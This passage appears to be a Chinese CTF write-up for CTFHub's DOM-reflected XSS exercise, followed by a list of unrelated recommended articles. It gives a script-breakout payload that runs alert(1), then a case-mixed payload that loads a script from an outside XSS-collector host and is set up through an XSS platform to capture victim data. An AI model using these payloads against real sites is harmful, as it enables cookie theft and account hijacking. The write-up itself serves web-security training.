根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式
然后去网页测试一下alert(1)反射
';</script><script>alert(1)</script>
看到 确实存在 去xssaq.cn
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
CTFHub技能树web——XSS——DOM反射
A 八方2024-08-06 21:41
相关推荐
玖月晴空6 分钟前
Uniapp 速查文档琉-璃8 分钟前
vue3+ts 任意组件间的通信 mitt的使用FogLetter27 分钟前
React Fiber 机制:让渲染变得“有礼貌”的魔法不想说话的麋鹿33 分钟前
「项目前言」从配置程序员到动手造轮子:我用Vue3+NestJS复刻低代码平台的初衷JunpengHu43 分钟前
esri-leaflet介绍zm4351 小时前
bpmn.js 自定义绘制流程图节点小杨梅君1 小时前
探索现代 CSS 色彩:从 HSL 到 OKLCH,打造动态色阶刺客_Andy1 小时前
React 第五十一节 Router中useOutletContext的使用详解及注意事项宁雨桥1 小时前
基于 Debian 服务器的前端项目部署完整教程JunpengHu1 小时前
CSS 滤镜(filter)